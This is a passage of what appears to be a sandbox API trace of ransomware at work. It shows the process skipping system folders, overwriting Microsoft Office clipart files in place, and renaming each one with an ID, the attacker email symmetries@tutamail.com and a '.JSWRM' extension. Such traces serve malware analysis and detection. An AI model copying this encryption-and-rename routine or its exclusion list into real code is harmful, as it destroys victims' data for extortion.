hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.407] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4068) returned 1 [0092.407] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfe0) returned 0x23fc98 [0092.407] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xfe0, lpOverlapped=0x0) returned 1 [0092.413] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.413] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xfe0, lpOverlapped=0x0) returned 1 [0092.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.414] CloseHandle (hObject=0x314) returned 1 [0092.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0092.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0092.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02127_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02127_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.415] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02262_.WMF", cAlternateFileName="")) returned 1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2=".") returned 1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="..") returned 1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="...") returned 1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="windows") returned -1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="recovery") returned -1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="perflogs") returned -1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="documents and settings") returned 1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="system volume information") returned -1 [0092.415] lstrcmpiW (lpString1="NA02262_.WMF", lpString2="msocache") returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02262_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02262_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02262_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02262_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02262_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02262_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.416] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3328) returned 1 [0092.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd00) returned 0x23fc98 [0092.416] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd00, lpOverlapped=0x0) returned 1 [0092.418] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.418] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd00, lpOverlapped=0x0) returned 1 [0092.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.419] CloseHandle (hObject=0x314) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.419] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02262_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02262_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.420] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02264_.WMF", cAlternateFileName="")) returned 1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2=".") returned 1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="..") returned 1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="...") returned 1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="windows") returned -1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="recovery") returned -1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="perflogs") returned -1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="documents and settings") returned 1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="system volume information") returned -1 [0092.420] lstrcmpiW (lpString1="NA02264_.WMF", lpString2="msocache") returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02264_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02264_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02264_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0092.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02264_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02264_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02264_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.421] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2272) returned 1 [0092.421] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e0) returned 0x20c6c0 [0092.422] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0092.424] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.425] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0092.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.425] CloseHandle (hObject=0x314) returned 1 [0092.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0092.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0092.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0092.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0092.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0092.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.425] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02264_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02264_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0092.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.426] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02356_.WMF", cAlternateFileName="")) returned 1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2=".") returned 1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="..") returned 1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="...") returned 1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="windows") returned -1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="recovery") returned -1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="perflogs") returned -1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="documents and settings") returned 1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="system volume information") returned -1 [0092.426] lstrcmpiW (lpString1="NA02356_.WMF", lpString2="msocache") returned 1 [0092.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02356_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02356_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02356_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0092.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02356_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02356_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02356_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0092.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.430] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3604) returned 1 [0092.430] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe10) returned 0x23fc98 [0092.430] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0092.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.433] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: 